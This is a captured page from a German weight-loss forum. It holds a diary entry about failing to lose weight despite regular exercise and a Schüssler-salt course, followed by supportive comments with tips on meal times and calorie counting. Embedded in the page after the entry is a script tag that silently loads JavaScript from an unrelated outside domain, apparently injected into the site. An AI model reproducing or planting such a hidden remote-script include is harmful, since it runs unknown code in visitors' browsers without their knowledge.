Zum Inhalt springen

Sie sind hier

:( ich bekomms nicht hin

0  0
Am von im Ernährungstagebuch geschrieben

Ich weiß nicht wo ich anfangen soll....

Der letzte stand war ja, dass ich das mit den Schüsslerzalzen ausprobiere. Jetzt ist die letzte Woche der Kur angebrochen. Gewichtstechnisch... ist nix passiert. Vom gefühl hatte ich aber weniger heißhunger auf süßes.

Das ich nicht abnehme kann durchaus daran liegen, dass ich sehr unregelmäßig esse und dann wahrscheinlich nicht abschätzen kann wann genug ist. Es belastet mich sehr, dass trotz aller anstrengungen nix passiert. Ich habe eine Zeit lang (Mai,Juni) auch zu wenig gegessen aus frust, was das ganze nicht umbedingt besser gemacht hat.

Zu wenig sport ist auch nicht mehr der Fall. Ich gehe jetzt seit ca. einem Monat regelmäßig drei mal die Woche Kickboxen, was mir auch super viel spaß macht (ich kannns leider nur noch bis ende September machen, danach werde ich aber wieder Volleyball spielen und Schwimmen, jeweils zwei mal die Woche)

 

Ich werde jetzt auch wieder versuchen regelmäßig Tagebuch zu führen und feste Essenszeiten festlegen. Frühstück = 9:00, Mittag 14:00 und abend 18:00. Dabei bleiben der Fernseher, Radio, Handy aus und ich esse langsam. (Ich hoffe das hilft um aus dem Hungerstoffwechsel wieder raus zu kommen, wie lange dauert das wohl?)

Ich hoffe, dass ich trotzdem bis zum 19.9 ca. 2 kg abnehme. Das wäre echt schön.

Wenn ihr noch tipps habt wie ich aus dem Hungerstoffwechsel wieder raus komme und meinen Grundumsatz erhöhen kann wäre ich euch sehr dankbar.

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Vorheriger Ernährungstagebuch-Eintrag
Bild von Tag 36 - Regen
Nächster Ernährungstagebuch-Eintrag
Bild von IsiKeks 26.08.2014 - die letzte woche gut überstanden

Kommentare

Bild des Benutzers laughy
0  0

Also Du hast Dich ja gut reflektiert, ich hab da nichts hinzu zu fügen ausser eben viel Gemüse Gemüse Gemüse ...:-)

*** Das Leben ist zu kurz um aufzugeben ***

Bild des Benutzers IsiKeks
0  0

immer wenn es mich überkommt versuch ich mir in gedanken zu rifen, ob es das wert ist...verlier dein ziel nicht aus den augen denk dran sport macht muskeln und muskeln wiegen mehr als fett vllt ist für dich das messen der maße sinnvoller (Beine/Arme/ Bauch)? oder machst du das schon?

Die Wunderdiät:
Nach dem Frühstück aufstehen,
das Mittagessen auf das Abendbrot verschieben
und vor dem Abendbrot ins Bett gehen.

Bild des Benutzers Tabbimaus
0  0

Ich würde wirklich erstmal konsequent Kalorien zählen und versuchen, nicht unter 1600 oder 1700 zu kommen und die beim Sport verbrauchten Kalorien extra zu essen. Dabei kann dir z.B. eine App helfen, Myfitnesspal ist ganz gut dafür. Dann bekommst du mal wieder ein Gefühl für die Mengen und die Kalorien, manchmal verschätzt man sich da erheblich. Ich mache das seit Februar und bin manchmal immernoch erstaunt, weil meine gefühlte Kalorienmenge und die tatsächliche doch erheblich auseinanderklaffen...sowohl zum positiven als auch zum negativen.

Wenn dein Körper sich daran gewöhnt hat, dass sein Grundbedürfnis an Kalorien erfüllt wird, dann wirst du auch wieder aus dem Hungerstoffwechsel rauskommen.

Bild des Benutzers Emma09
0  0

daran liegen Schokomaus Biggrin - denn dein Körper mußt quasi wieder neu erziehen - das heißt: feste Zeiten zum Essen,wie schon Tabbi sagt,mal Kalorien zählen ( ich persönlich hatle zwar nichts davon ) denn ich hab mal gegoogelt und da stand drin,das man weniger kcal zu sich nehmen sollte,um ab zunehmen - aber da teilen sich ja auch die Meinugen - auf jeden Fall solltest du nicht drüber liegen - wichtig ist dabei noch: viel Gemüse,Trinken und ich bau immer wieder auf die Eiweisse auf I-m so happy

wünsche dir viel Glück

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Eintrag in ein Ernährungstagebuch von Ramona60: heute mal ganz genau auf die verbrannten "Kcal" auf meinem Crosstrainer geschaut. Es sind nicht Kcal sonder Kjoul, so ein Mist aber auch.   Um 500 kcal zu verbrennen muss ich 2093 kjoul erzielen....
Eintrag in ein Ernährungstagebuch von TrEmLi: Ich habe mir ja fest vorgenommen, hier wieder aktiver zu sein und regelmäßig Tagebuch-Einträge zu schreiben. Also auf geht's! Zu den letzten 33 Tagen, die ich hier nichts geschrieben habe: Ich habe...
Motivation von Solveigh: und wieder ein Pfund weniger!  Das ist für mich solch eine Motivation. Mich zu erleben, dass das was ich will, ich auch umsetzen kann. Ichbenenne ein  Ziel und sehe mir selbst zu, wie ich ihm...
Ziel für den Abnehmplan von LiLaLillyfee: Ich fliege am 5.10. nach Griechenland. Das ist leider nicht mehr lange. Schon seit Monaten versuche ich deshalb abzunehmen. Bisher schien es als hätte ich noch so viel Zeit, aber nun ist es...
Eintrag in ein Ernährungstagebuch von Katjusch: Ich versuche mein System vom letztem Jahr wieder umzusetzen, welches bis jetzt ganz gut funktioniert. Mittags gibt es an Stelle von Kantinenessen Obst, wodurch ich eine ganze Ecke Kalorien einspare....
Eintrag in ein Ernährungstagebuch von hexelein: So wieder eine Woche rum habe etwas zugenommen hält sich im rahmen aber ganz ehrlich habe ich diese Woche auch einen schwenker gehabt leider schon so früh am Anfang.. Aber diese woche wieder voll...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst